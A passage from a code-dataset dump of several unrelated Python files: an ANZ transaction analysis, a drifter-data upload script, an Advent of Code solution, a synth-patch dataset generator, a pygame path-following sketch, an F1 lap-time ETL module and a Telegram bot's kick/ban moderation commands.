Age for October\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# Using an heatmap: \n\n# In[46]:\n\n\ncorrmat = ANZ.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nsns.heatmap(corrmat, vmax=.8, square=True);\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Drimdave/My-ANZ-Internship-Work","sub_path":"Exploratory Data Analysis using the ANZ Synthesized Transaction Dataset.py","file_name":"Exploratory Data Analysis using the ANZ Synthesized Transaction Dataset.py","file_ext":"py","file_size_in_byte":7856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9939385199","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 23 14:32:42 2019\n\nFeb 28,2020 Mingchao\n input local time,then change the time style in functions of raw_tele_modules for filtering the data\nAPR 29,2020 Mingchao\n add TimeoutError, in case upload data to student drifter have issue\nMay 6,2020 Mingchao\n change the function of up.sd2drf for being suitable with Windows\n@author: leizhao\n\"\"\"\n\nimport raw_tele_modules as rdm\nfrom datetime import datetime,timedelta\nimport os\nimport upload_modules as up\nimport ftpdownload\n\n\ndef week_start_end(dtime,interval=0):\n '''input a time, \n if the interval is 0, return this week monday 0:00:00 and next week monday 0:00:00\n if the interval is 1,return last week monday 0:00:00 and this week monday 0:00:00'''\n delta=dtime-datetime(2003,1,1,0,0)-timedelta(weeks=interval)\n count=int(delta/timedelta(weeks=1))\n start_time=datetime(2003,1,1,0,0)+timedelta(weeks=count)\n end_time=datetime(2003,1,1,0,0)+timedelta(weeks=count+1) \n return start_time,end_time \ndef main():\n realpath=os.path.dirname(os.path.abspath(__file__))\n #realpath='E:/programe/raw_data_match/py'\n parameterpath=realpath.replace('py','parameter')\n #HARDCODING\n raw_data_name_file=os.path.join(parameterpath,'raw_data_name.txt') #this data conclude the VP_NUM HULL_NUM VESSEL_NAME\n #raw_data_name_file='E:/programe/raw_data_match/parameter/raw_data_name.txt'\n output_path=realpath.replace('py','result') #use to save the data \n telemetry_status=os.path.join(parameterpath,'telemetry_status.csv')\n #telemetry_status='E:/programe/aqmain/parameter/telemetry_status.csv'\n lack_data_path=os.path.join(output_path, 'lack_data.txt')\n #lack_data_path='E:/programe/raw_data_match/result/lack_data.txt'#store the name of file that lacked data after 'classfy finished'\n # below hardcodes is the informations to upload local data to student drifter. 
\n subdir=['Matdata','checked']\n mremote='/Raw_Data'\n #mremote='\\Raw_Data'\n remote_subdir=['Matdata','checked']\n ###########################\n end_time=datetime.utcnow()\n #start_time,end_time=week_start_end(end_time,interval=1)\n start_time=end_time-timedelta(weeks=1)\n #download raw data from website\n files=ftpdownload.download(localpath='E:\\\\programe\\\\raw_data_match\\\\result\\\\Matdata', ftppath='/Matdata')\n #classify the file by every boats\n rdm.classify_by_boat(indir='E:\\\\programe\\\\raw_data_match\\\\result\\\\Matdata',outdir='E:\\\\programe\\\\raw_data_match\\\\result\\\\classified',pstatus=telemetry_status)\n print('classfy finished!')\n #check the reformat of every file:include header,heading,lat,lon,depth,temperature.\n rdm.check_reformat_data(indir='E:\\\\programe\\\\raw_data_match\\\\result\\\\classified',outdir='E:\\\\programe\\\\raw_data_match\\\\result\\\\checked',startt=start_time,\\\n endt=end_time,pstatus=telemetry_status,rdnf=raw_data_name_file,lack_data=lack_data_path)\n print('check format finished!')\n for i in range(len(subdir)):\n local_dir=os.path.join(output_path,subdir[i])\n #remote_dir=os.path.join(mremote,remote_subdir[i])\n remote_dir=os.path.join(mremote,remote_subdir[i]).replace('\\\\', '/')\n #up.sd2drf(local_dir,remote_dir,filetype='csv',keepfolder=True)\n try:\n up.sd2drf(local_dir, remote_dir, filetype='csv', keepfolder=True)\n except TimeoutError:\n print('Timeout Error')\nif __name__=='__main__':\n main()","repo_name":"Mingchao19960125/Others","sub_path":"2020_weekly/check_csv.py","file_name":"check_csv.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31577470889","text":"import sys\ndef myord(k):\n if (k >= 'a' and k <= 'z'):\n return ord(k) - ord('a') + 1\n if (k >= 'A' and k <= 'Z'):\n return ord(k) - ord('A') + 27\n raise Exception('Invalid letter: ' + k)\ndef common(s1, s2):\n c = ''\n for k1 in s1:\n for k2 in s2:\n if (k1 == k2):\n c += k1\n return c\ni = 0\nc = ''\nt = 0\nfor r in map(str.rstrip, sys.stdin):\n if (i == 0):\n c = r\n else:\n c = common(c, r)\n if (i == 2):\n o = myord(c[0])\n t += o\n print(c, o)\n i = 0\n else:\n i = i + 1\nprint(t)\n","repo_name":"lapo-luchini/advent","sub_path":"2022/03b.py","file_name":"03b.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71307098813","text":"import SynthPy as sp\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport gc\n\n\nCHUNK_SIZE = 1000\nTRAIN_SET_SIZE = 100000\nTEST_SET_SIZE = 10000\nTRAIN_SET_PATCH_DIR = 'Train_Patches'\nTEST_SET_PATCH_DIR = 'Test_Patches'\nPLUGIN_PATH = 'E:/VST/u-he/Diva.dll'\n\n\nif not os.path.exists(TRAIN_SET_PATCH_DIR):\n os.makedirs(TRAIN_SET_PATCH_DIR)\nif not os.path.exists(TEST_SET_PATCH_DIR):\n os.makedirs(TEST_SET_PATCH_DIR) \n\n# Generate Training Set\ndef gen_data(host, train=True):\n data_set = []\n generator = sp.PatchGenerator(host)\n\n for data_patch in tqdm(range(1,TRAIN_SET_SIZE+1)):\n\n patch = generator.get_random_patch()\n host.set_patch(patch)\n host.render_patch(72, 127, 1.0, 4.0)\n params = np.array([i[1] for i in patch])\n data_set.append(np.array([np.array(host.get_audio_frames()), params]))\n\n if data_patch % CHUNK_SIZE == 0:\n data_set = np.array(data_set)\n if train:\n with open(f'{TRAIN_SET_PATCH_DIR}/{data_patch}.spatch', 'wb') as f:\n np.save(f, data_set)\n else:\n with 
open(f'{TEST_SET_PATCH_DIR}/{data_patch}.spatch', 'wb') as f:\n np.save(f, data_set)\n data_set = []\n gc.collect()\n\nif __name__ == '__main__':\n host = sp.Host(44100, 512, 512)\n\n if host.load_plugin(PLUGIN_PATH):\n print('Plugin Loaded!')\n \n # generate train:\n print('Generating training data...')\n gen_data(host)\n\n # gen test:\n print('Generating testing data...')\n gen_data(host, train=False)\n\n \n\n\n","repo_name":"hichiaty/SynthPy","sub_path":"NN/data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74809974330","text":"\nimport sys\nsys.path.append(\"C:\\\\Users\\\\Luke\\\\Documents\\\\Learning Python\\\\\")\nimport LukeLibrary as LL\n\nimport math\nimport pygame\n\nscreenW = 700\nscreenH = 500\nscreen = pygame.display.set_mode((screenW, screenH))\n\nvehicleRadius = 20\n\nclass Path:\n def __init__(self, nodeCount, smoothingCount=-1, pathWidth_=vehicleRadius*2.5):\n self.nodeCount = nodeCount\n \n self.pathNoise = LL.generate1DNoise(self.nodeCount, noiseScale=0.1, smoothCount=smoothingCount)\n\n self.innerNodes = []\n self.outerNodes = []\n\n self.pathWidth = pathWidth_\n self.setNodePositions()\n\n def setNodePositions(self):\n\n centerNodes = []\n\n for c in range(0, self.nodeCount):\n theta = (math.pi * 2.0 / self.nodeCount) * c\n\n pathCenterRadiusX = (self.pathNoise[c] * screenW * 0.5)\n pathCenterRadiusY = (self.pathNoise[c] * screenH * 0.5)\n\n pathCenterNodeX = (screenW / 2) + (math.cos(theta) * pathCenterRadiusX)\n pathCenterNodeY = (screenH / 2) + (math.sin(theta) * pathCenterRadiusY)\n\n centerNodes.append(LL.Vector(pathCenterNodeX, pathCenterNodeY))\n \n self.innerNodes.clear()\n self.outerNodes.clear()\n for c in range(0, self.nodeCount):\n n = (c + 1) % self.nodeCount\n\n nodeDx = centerNodes[n].x - centerNodes[c].x\n nodeDy = centerNodes[n].y - centerNodes[c].y\n angleToNextNode = math.atan2(nodeDy, nodeDx)\n\n self.outerNodes.append(LL.Vector(\n centerNodes[c].x + (math.cos(angleToNextNode - (math.pi/2)) * (self.pathWidth / 2)),\n centerNodes[c].y + (math.sin(angleToNextNode - (math.pi/2)) * (self.pathWidth / 2))\n )\n )\n\n self.innerNodes.append(LL.Vector(\n centerNodes[c].x + (math.cos(angleToNextNode + (math.pi/2)) * (self.pathWidth / 2)),\n centerNodes[c].y + (math.sin(angleToNextNode + (math.pi/2)) * (self.pathWidth / 2))\n )\n )\n\n def render(self):\n \n for c in range(0, self.nodeCount):\n n = (c + 1) % self.nodeCount\n\n ix1 = int(self.innerNodes[c].x)\n iy1 = int(self.innerNodes[c].y)\n ix2 = int(self.innerNodes[n].x)\n iy2 = int(self.innerNodes[n].y)\n pygame.draw.line(\n screen, (0, 0, 0),\n (ix1, iy1), (ix2, iy2),\n 1\n )\n\n ox1 = int(self.outerNodes[c].x)\n oy1 = int(self.outerNodes[c].y)\n ox2 = int(self.outerNodes[n].x)\n oy2 = int(self.outerNodes[n].y)\n pygame.draw.line(\n screen, (0, 0, 0),\n (ox1, oy1), (ox2, oy2),\n 1\n )\npath = Path(64) #Path(256, 1200)\n\n# see \"path following 2.2: line 187 for next step\"\nclass Vehicle:\n def __init__(self):\n startX = (path.innerNodes[0].x + path.outerNodes[0].x) / 2\n startY = (path.innerNodes[0].y + path.outerNodes[0].y) / 2\n self.position = LL.Vector(startX, startY)\n self.velocity = LL.Vector(0, 0.001)\n\n self.sensorAngle = math.pi\n self.sensorCount = 5\n self.sensors = [LL.Sensor() for _ in range(0, self.sensorCount)]\n def move(self):\n self.position.add(self.velocity)\n\n def updateSensors(self):\n for i in range(0, self.sensorCount):\n theta = 
self.velocity.heading() + ((self.sensorAngle / (self.sensorCount-1)) * i) - (self.sensorAngle / 2)\n x = self.position.x + (math.cos(theta) * vehicleRadius)\n y = self.position.y + (math.sin(theta) * vehicleRadius)\n self.sensors[i].update(LL.Vector(x, y), theta)\n self.sensors[i].measure(screen, wallList)\n\n def render(self):\n pygame.draw.circle(\n screen, (150, 100, 150),\n (int(self.position.x), int(self.position.y)),\n vehicleRadius, 1\n )\n for s in self.sensors:\n s.display(screen)\n\n def update(self):\n self.move()\n self.updateSensors()\n self.render()\n\n\n\nPopulation = [Vehicle() for _ in range(0, 1)]\n\nwhile(True):\n screen.fill((255, 255, 255))\n path.render()\n\n for veh in Population:\n veh.update()\n\n \n pygame.display.flip()","repo_name":"Dowzer721/vsCode-Sync","sub_path":"Path Following/Path Following v3.0.py","file_name":"Path Following v3.0.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10008001793","text":"\"\"\"\nETL helpers for JOLYON database and its various tables.\n\"\"\"\nimport os\nimport math\nimport numpy as np\nimport pandas as pd\nfrom jolyon.src.db_configs import DATA_FILES\n\n\ndef fetch_data_local(filepath=\"\"):\n \"\"\"\n Compiles an entire CSV dump from Ergast into a dictionary of relevant\n datasets/pd.DataFrames.\n\n Args:\n filepath : str.\n A filepath to the CSV dump\n\n Returns : dict[]\n A dictionary of datasets in the Ergast CSV dump.\n \"\"\"\n data = {}\n for item in DATA_FILES:\n item_df = pd.read_csv(f\"{filepath}{item}\")\n data[item.replace(\".csv\", \"\")] = item_df\n return data\n\n\ndef parse_pit_stops(pit_stop_df):\n \"\"\"\n Parses the pit_stops.csv file provided by Ergast.\n\n Args:\n pit_stop_df : pd.DataFrame\n The dataframe containing raw pit_stops.csv\n Returns : pd.DataFrame\n A processed version of 'pit_stops.csv'\n \"\"\"\n pit_stop_df_copy = pit_stop_df.copy()\n pit_stop_df_copy[\"seconds\"] = np.divide(\n pit_stop_df_copy[\"milliseconds\"].values, 1000.0\n )\n return pit_stop_df_copy[[\"raceId\", \"driverId\", \"stop\", \"lap\", \"seconds\"]]\n\n\ndef parse_lap_times(data):\n \"\"\"\n Performs basic wrangling/processing on the lap_times dataset.\n\n Args:\n data : dict\n A dictionary of data, as outputted by fetch_data_local()\n\n Returns : pd.DataFrame\n Wrangled lap time data.\n \"\"\"\n lap_time_df = data[\"lap_times\"].copy()\n lap_time_df[\"seconds\"] = np.divide(lap_time_df[\"milliseconds\"].values, 1000.0)\n lap_time_df = pd.merge(\n lap_time_df,\n data[\"results\"].groupby(\"raceId\", as_index=False)[\"laps\"].max(),\n how=\"inner\",\n on=\"raceId\",\n ).rename(columns={\"laps\": \"race_laps\"})\n lap_time_df[\"pct_complete\"] = np.divide(\n lap_time_df.lap.values, lap_time_df.race_laps.values\n )\n\n pit_stop_df = parse_pit_stops(data[\"pit_stops\"])\n pit_stop_df_2 = pit_stop_df.copy()\n pit_stop_df_2[\"lap\"] = pit_stop_df_2[\"lap\"].values + 1\n\n combined_df = (\n lap_time_df.merge(\n pit_stop_df.drop(columns=[\"seconds\"]),\n how=\"left\",\n on=[\"raceId\", \"driverId\", \"lap\"],\n )\n .merge(\n pit_stop_df_2[[\"raceId\", \"driverId\", \"lap\", \"stop\"]],\n how=\"left\",\n on=[\"raceId\", \"driverId\", \"lap\"],\n suffixes=[\"_in\", \"_out\"],\n )\n .sort_values([\"raceId\", \"driverId\", \"lap\"])\n .fillna(value={\"stop_in\": 0, \"stop_out\": 0})\n )\n\n combined_df[\"stops\"] = combined_df.groupby([\"raceId\", \"driverId\"])[\n \"stop_out\"\n ].cummax()\n combined_df[\"total_seconds\"] = 
combined_df.groupby([\"raceId\", \"driverId\"])[\n \"seconds\"\n ].cumsum()\n\n combined_df[\"stint\"] = combined_df[\"stops\"].values + 1\n combined_df[\"is_inlap\"] = (combined_df.stop_in.values > 0).astype(int)\n combined_df[\"is_outlap\"] = (combined_df.stop_out.values > 0).astype(int)\n return combined_df\n\n\ndef parse_quali_df(quali_df, fill_value=np.nan):\n \"\"\"\"\"\"\n quali_df_new = (\n quali_df.copy()\n .reset_index(drop=True)\n .rename(columns={\"q1\": \"q1_str\", \"q2\": \"q2_str\", \"q3\": \"q3_str\"})\n )\n for q in [\"q1\", \"q2\", \"q3\"]:\n quali_secs = []\n for item in quali_df[q].values:\n try:\n lap_time_secs = 60.0 * int(item.split(\":\")[0]) + float(\n item.split(\":\")[1]\n )\n except (TypeError, ValueError, AttributeError):\n lap_time_secs = fill_value\n quali_secs.append(lap_time_secs)\n quali_df_new[q] = quali_secs\n for q in [\"q1\", \"q2\", \"q3\"]:\n quali_df_new = quali_df_new.sort_values([\"raceId\", q])\n quali_df_new[f\"rank_{q}\"] = 1\n quali_df_new[f\"rank_{q}\"] = quali_df_new.groupby([\"raceId\"], as_index=False)[\n f\"rank_{q}\"\n ].cumsum()\n return quali_df_new\n\n\ndef parse_quali_summary(qualifying_df):\n \"\"\"\n Provides a summary snapshot of qualifying, including:\n * Times necessary to have escaped Q1, Q2\n * Pole time\n * Best overall time\n\n Args:\n qualifying_df : pd.DataFrame\n A WRANGLED qualifying df, as outputted by parse_quali_df()\n Returns : pd.DataFrame\n \"\"\"\n quali_df = qualifying_df.copy()\n quali_df[\"best_time\"] = quali_df[[\"q1\", \"q2\", \"q3\"]].apply(\n lambda x: min(x[\"q1\"], x[\"q2\"], x[\"q3\"]), axis=1\n )\n q1_cut = (\n quali_df.query(\"rank_q1 >= 16\")\n .sort_values([\"raceId\", \"rank_q1\"])\n .groupby([\"raceId\"], as_index=False)\n .head(1)\n )\n\n q2_cut = (\n quali_df.query(\"rank_q2 >= 11\")\n .sort_values([\"raceId\", \"rank_q2\"])\n .groupby([\"raceId\"], as_index=False)\n .head(1)\n )\n\n pole_times = quali_df.query(\"rank_q3 == 1\")\n\n best_times = quali_df.groupby([\"raceId\"], as_index=False)[\"best_time\"].min()\n\n result = (\n q1_cut[[\"raceId\", \"q1\"]]\n .merge(q2_cut[[\"raceId\", \"q2\"]], how=\"left\", on=\"raceId\")\n .merge(pole_times[[\"raceId\", \"q3\"]], how=\"left\", on=\"raceId\")\n .merge(best_times[[\"raceId\", \"best_time\"]])\n .rename(\n columns={\"q1\": \"q1_escape_time\", \"q2\": \"q2_escape_time\", \"q3\": \"pole_time\"}\n )\n )\n result[\"time_107\"] = 1.07 * result.pole_time.values\n return result\n\n\ndef parse_race_df():\n pass\n\n\ndef parse_driver_df(driver_df):\n driver_df_copy = driver_df.copy()\n driver_df_copy[\"number\"] = np.array(\n [int(str(item)) if \"N\" not in item else np.nan for item in driver_df.number]\n )\n # driver_df_copy['dob'] = np.array([pd.Timestamp(item).date() for item in driver_df.dob])\n driver_df_copy[\"name\"] = np.array(\n [\n f\"{fore} {sur}\".replace(\"'\", \"\")\n for fore, sur in list(zip(driver_df.forename, driver_df.surname))\n ]\n )\n return driver_df_copy\n\n\ndef parse_result_df(data):\n result_df = data[\"results\"].copy()\n result_df = pd.merge(\n result_df, data[\"races\"][[\"year\", \"raceId\"]], how=\"inner\", on=[\"raceId\"]\n )\n result_df = pd.merge(\n result_df,\n result_df.groupby(\"raceId\", as_index=False)[\"laps\"].max(),\n how=\"inner\",\n on=\"raceId\",\n suffixes=[\"\", \"_all\"],\n )\n result_df[\"pct_complete\"] = np.divide(\n result_df.laps.values, result_df.laps_all.values\n )\n\n result_df[\"not_on_grid\"] = (result_df.grid.values == 0).astype(int)\n result_df[\"grid\"] = np.array([100 if i == 0 else i for i 
in result_df.grid])\n result_df[\"classification\"] = result_df[[\"positionText\", \"positionOrder\"]].apply(\n lambda x: 100\n if x[\"positionText\"] in [\"W\", \"F\"]\n else 99\n if x[\"positionText\"] == \"R\"\n else int(x[\"positionOrder\"]),\n axis=1,\n )\n result_df[\"position\"] = result_df.positionOrder.values.astype(int)\n result_df[\"pitlane_start\"] = (\n (result_df.grid.values == 100) * (result_df.not_on_grid.values == 1)\n ).astype(int)\n\n result_df = pd.merge(result_df, data[\"status\"], how=\"left\", on=\"statusId\")\n result_df[\"finished_running\"] = np.array(\n [int(\"Lap\" in item or item == \"Finished\") for item in result_df.status.values]\n )\n # TODO: parse race time and fastest laps\n return result_df\n\n\ndef parse_lap_time_deltas(data):\n \"\"\"\"\"\"\n\n results = (\n data[\"results\"]\n .query(\"year >= 2005\")\n .rename(columns={\"position\": \"finish_position\"})\n )\n lap_times = parse_lap_times(data)[\n [\"raceId\", \"driverId\", \"position\", \"seconds\", \"total_seconds\", \"lap\"]\n ]\n\n delta_df = (\n pd.merge(\n results[\n [\"raceId\", \"driverId\", \"laps\", \"finished_running\", \"finish_position\"]\n ],\n results[\n [\"raceId\", \"driverId\", \"laps\", \"finished_running\", \"finish_position\"]\n ],\n how=\"inner\",\n on=\"raceId\",\n suffixes=[\"_ahead\", \"_behind\"],\n )\n .merge(\n lap_times[[\"raceId\", \"lap\"]]\n .groupby([\"raceId\", \"lap\"], as_index=False)\n .head(1),\n how=\"left\",\n on=[\"raceId\"],\n )\n .merge(\n lap_times.rename(columns={\"driverId\": \"driverId_ahead\"}),\n how=\"left\",\n on=[\"raceId\", \"driverId_ahead\", \"lap\"],\n )\n .merge(\n lap_times.rename(columns={\"driverId\": \"driverId_behind\"}),\n how=\"left\",\n on=[\"raceId\", \"driverId_behind\", \"lap\"],\n suffixes=[\"_ahead\", \"_behind\"],\n )\n .sort_values(\n [\n \"raceId\",\n \"lap\",\n \"position_ahead\",\n \"position_behind\",\n \"total_seconds_ahead\",\n \"total_seconds_behind\",\n \"finish_position_ahead\",\n \"finish_position_behind\",\n ]\n )\n .reset_index(drop=True)\n )\n\n # compute delta on the last lap\n delta_df[\"lap_time_delta\"] = np.subtract(\n delta_df.seconds_ahead.values, delta_df.seconds_behind.values,\n )\n # compute overall race delta\n delta_df[\"race_time_delta\"] = np.subtract(\n delta_df.total_seconds_ahead.values, delta_df.total_seconds_behind.values,\n )\n\n # compute laps down\n delta_df[\"is_lap_down_ahead\"] = np.multiply(\n np.isnan(delta_df.seconds_ahead.values).astype(int),\n delta_df.finished_running_ahead.values,\n )\n\n delta_df[\"is_lap_down_behind\"] = np.multiply(\n np.isnan(delta_df.seconds_behind.values).astype(int),\n delta_df.finished_running_behind.values,\n )\n\n # compute retirements\n delta_df[\"is_retired_ahead\"] = np.multiply(\n np.isnan(delta_df.seconds_ahead.values).astype(int),\n 1 - delta_df.is_lap_down_ahead.values,\n )\n\n delta_df[\"is_retired_behind\"] = np.multiply(\n np.isnan(delta_df.seconds_behind.values).astype(int),\n 1 - delta_df.is_lap_down_behind.values,\n )\n\n delta_df[\"ctr\"] = 1\n\n delta_df[\"row_idx_behind\"] = (\n delta_df.sort_values(\n [\n \"raceId\",\n \"lap\",\n \"total_seconds_ahead\",\n \"finish_position_ahead\",\n \"total_seconds_behind\",\n \"finish_position_behind\",\n ]\n )\n .groupby([\"raceId\", \"lap\", \"driverId_ahead\"])[\"ctr\"]\n .cumsum()\n )\n\n delta_df[\"position_behind\"] = delta_df[[\"position_behind\", \"row_idx_behind\"]].apply(\n lambda x: x[\"row_idx_behind\"]\n if np.isnan(x[\"position_behind\"]) or math.isnan(x[\"position_behind\"])\n else 
x[\"position_behind\"],\n axis=1,\n )\n\n delta_df[\"row_idx_ahead\"] = (\n delta_df.sort_values(\n [\n \"raceId\",\n \"lap\",\n \"total_seconds_behind\",\n \"finish_position_behind\",\n \"total_seconds_ahead\",\n \"finish_position_ahead\",\n ]\n )\n .groupby([\"raceId\", \"lap\", \"driverId_behind\"])[\"ctr\"]\n .cumsum()\n )\n\n delta_df[\"position_ahead\"] = delta_df[[\"position_ahead\", \"row_idx_ahead\"]].apply(\n lambda x: x[\"row_idx_ahead\"]\n if np.isnan(x[\"position_ahead\"]) or math.isnan(x[\"position_ahead\"])\n else x[\"position_ahead\"],\n axis=1,\n )\n\n return delta_df\n\n\ndef fetch_parse_data():\n \"\"\"\n Main ETL function: reads in and processes everything thus far\n \"\"\"\n # TODO: switch print --> logger.info\n data = fetch_data_local(\"/Users/IKleisle/F1/data/\")\n print(\"Data acquired.\")\n\n data[\"qualifying\"] = parse_quali_df(data[\"qualifying\"])\n print(\"Quali data wrangled.\")\n\n data[\"qualifying_summary\"] = parse_quali_summary(data[\"qualifying\"])\n print(\"Quali summary data wrangled.\")\n\n data[\"drivers\"] = parse_driver_df(data[\"drivers\"])\n print(\"Driver metadata wrangled.\")\n\n data[\"lap_times_full\"] = parse_lap_times(data)\n print(\"Lap times wrangled.\")\n\n data[\"results\"] = parse_result_df(data)\n print(\"Results wrangled.\")\n\n data[\"lap_time_deltas\"] = parse_lap_time_deltas(data)\n print(\"Lap time deltas wrangled.\")\n\n print(\"ETL complete!\")\n return data\n","repo_name":"isaackleislemurphy/jolyon","sub_path":"src/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":12145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26666230220","text":"import asyncio\nfrom time import time\nfrom pyrogram import filters\nfrom pyrogram.types import Message\nfrom Miyuki.utils.extract_user import extract_user\nfrom Miyuki import BOT_ID, SUDOERS, app\nfrom Miyuki.utils.functions import (extract_user_and_reason,\n time_converter)\nfrom Miyuki.core.decorators.permissions import adminsOnly\nfrom pyrogram.types import Message\nfrom lang import get_command\nfrom Miyuki.utils.commands import *\nfrom Miyuki.utils.lang import *\n\nKICK_ME = get_command(\"KICK_ME\")\nSKICK = get_command(\"SKICK\")\nKICK = get_command(\"KICK\")\nBAN = get_command(\"BAN\")\nUNBAN = get_command(\"UNBAN\")\nSBAN = get_command(\"SBAN\")\n\n\nasync def member_permissions(chat_id: int, user_id: int):\n perms = []\n try:\n member = await app.get_chat_member(chat_id, user_id)\n except Exception:\n return []\n if member.can_post_messages:\n perms.append(\"can_post_messages\")\n if member.can_edit_messages:\n perms.append(\"can_edit_messages\")\n if member.can_delete_messages:\n perms.append(\"can_delete_messages\")\n if member.can_restrict_members:\n perms.append(\"can_restrict_members\")\n if member.can_promote_members:\n perms.append(\"can_promote_members\")\n if member.can_change_info:\n perms.append(\"can_change_info\")\n if member.can_invite_users:\n perms.append(\"can_invite_users\")\n if member.can_pin_messages:\n perms.append(\"can_pin_messages\")\n if member.can_manage_voice_chats:\n perms.append(\"can_manage_voice_chats\")\n return perms\n\nadmins_in_chat = {}\n\nasync def list_admins(chat_id: int):\n return [ member.user.id\n async for member in app.iter_chat_members(\n chat_id, filter=\"administrators\"\n )]\n\n\nasync def current_chat_permissions(chat_id):\n perms = []\n perm = (await app.get_chat(chat_id)).permissions\n if perm.can_send_messages:\n perms.append(\"can_send_messages\")\n if 
perm.can_send_media_messages:\n perms.append(\"can_send_media_messages\")\n if perm.can_send_other_messages:\n perms.append(\"can_send_other_messages\")\n if perm.can_add_web_page_previews:\n perms.append(\"can_add_web_page_previews\")\n if perm.can_send_polls:\n perms.append(\"can_send_polls\")\n if perm.can_change_info:\n perms.append(\"can_change_info\")\n if perm.can_invite_users:\n perms.append(\"can_invite_users\")\n if perm.can_pin_messages:\n perms.append(\"can_pin_messages\")\n\n return perms\n\n\n@app.on_message(command(KICK_ME) )\n@language\nasync def kickFunc(client, message: Message, _):\n reason = None\n if len(message.text.split()) >= 2:\n reason = message.text.split(None, 1)[1]\n try:\n await message.chat.ban_member(message.from_user.id)\n txt = \"you're right - get out.\"\n txt += f\"\\nReason: {reason}\" if reason else \"\"\n await message.reply_text(txt)\n await message.chat.unban_member(message.from_user.id)\n except Exception as ef:\n await message.reply_text(f\"{ef}\")\n return\n\n@app.on_message(command(SKICK))\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def kickFunc(client, message: Message, _):\n if len(message.text.split()) == 1 and not message.reply_to_message:\n return\n try:\n user_id = await extract_user(app, message)\n except Exception:\n return \n if not user_id:\n await message.reply_text(_[\"ban2\"])\n return \n try:\n await message.chat.ban_member(user_id)\n await message.delete()\n if message.reply_to_message:\n await message.reply_to_message.delete()\n await message.chat.unban_member(user_id)\n except Exception as ef:\n await message.reply_text(f\"{ef}\")\n return\n\n@app.on_message(command(KICK))\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def kickFunc(client, message: Message, _):\n user_id, reason = await extract_user_and_reason(message, sender_chat=True)\n \n if not user_id:\n return await message.reply_text(_[\"ban3\"])\n if user_id == BOT_ID:\n return await message.reply_text(_[\"ban4\"])\n if user_id in SUDOERS:\n return await message.reply_text(_[\"ban6\"])\n if user_id in await list_admins(message.chat.id):\n return await message.reply_text(_[\"ban7\"])\n mention = (await app.get_users(user_id)).mention\n msg = f\"\"\"\n{mention}** Was Kicked By:** {message.from_user.mention if message.from_user else 'Anon'}\n**Reason:** {reason or 'No Reason Provided.'}\"\"\"\n if message.command[0][0] == \"d\":\n await message.reply_to_message.delete()\n await message.chat.ban_member(user_id)\n await message.reply_text(msg)\n await asyncio.sleep(1)\n await message.chat.unban_member(user_id)\n\n\n@app.on_message(command(BAN))\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def banFunc(client, message: Message, _):\n user_id, reason = await extract_user_and_reason(message, sender_chat=True)\n\n if not user_id:\n return await message.reply_text(_[\"ban3\"])\n if user_id == BOT_ID:\n return await message.reply_text(_[\"ban4\"])\n if user_id in SUDOERS:\n return await message.reply_text(_[\"ban6\"])\n user_status = (await message.chat.get_member(user_id)).status \n if user_status in {\"creator\", \"administrator\"}:\n return\n try:\n mention = (await app.get_users(user_id)).mention\n except IndexError:\n mention = (\n message.reply_to_message.sender_chat.title\n if message.reply_to_message\n else \"Anon\"\n )\n\n msg = (\n f\"{mention}\\n\"\n f\"**Was Banned By:** {message.from_user.mention if message.from_user else 'Anon'}\\n\"\n )\n if message.command[0][0] == \"d\":\n await message.reply_to_message.delete()\n if 
message.command[0] == \"tban\":\n split = reason.split(None, 1)\n time_value = split[0]\n temp_reason = split[1] if len(split) > 1 else \"\"\n temp_ban = await time_converter(message, time_value)\n msg += f\"**Banned For:** {time_value}\\n\"\n if temp_reason:\n msg += f\"**Reason:** {temp_reason}\"\n try:\n if len(time_value[:-1]) < 3:\n await message.chat.ban_member(user_id, until_date=temp_ban)\n await message.reply_text(msg)\n else:\n await message.reply_text(_[\"ban14\"])\n except AttributeError:\n pass\n return\n if reason:\n msg += f\"**Reason:** {reason}\"\n await message.chat.ban_member(user_id)\n await message.reply_text(msg)\n\n\n@app.on_message(command(UNBAN) & filters.incoming)\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def unbanFunc(client, message: Message, _):\n if len(message.command) == 2:\n user = message.text.split(None, 1)[1]\n elif len(message.command) == 1 and message.reply_to_message:\n user = message.reply_to_message.from_user.id\n else:\n return await message.reply_text(_[\"ban15\"])\n await message.chat.unban_member(user)\n umention = (await app.get_users(user)).mention\n await message.reply_text(_[\"ban14\"].format({umention}))\n\n\n@app.on_message(command(SBAN) & filters.incoming)\n@adminsOnly(\"can_restrict_members\")\nasync def kickFunc(client, message: Message, _):\n if len(message.text.split()) == 1 and not message.reply_to_message:\n return\n try:\n user_id = await extract_user(app, message)\n except Exception:\n return \n if not user_id:\n await message.reply_text(\"Cannot find user to kick\")\n return \n try:\n await message.chat.ban_member(user_id)\n await message.delete()\n if message.reply_to_message:\n await message.reply_to_message.delete()\n except Exception as ef:\n await message.reply_text(f\"{ef}\")\n return\n\n__MODULE__ = \"Restrict\"\n__HELP__ = \"\"\"\nSome people need to be publicly banned; spammers, annoyances, or just trolls.\n\nThis module allows you to do that easily, by exposing some common actions, so everyone will see!\n\n**User commands:**\n- /kickme: Users that use this, kick themselves.\n\n**Admin commands:**\n- /ban: 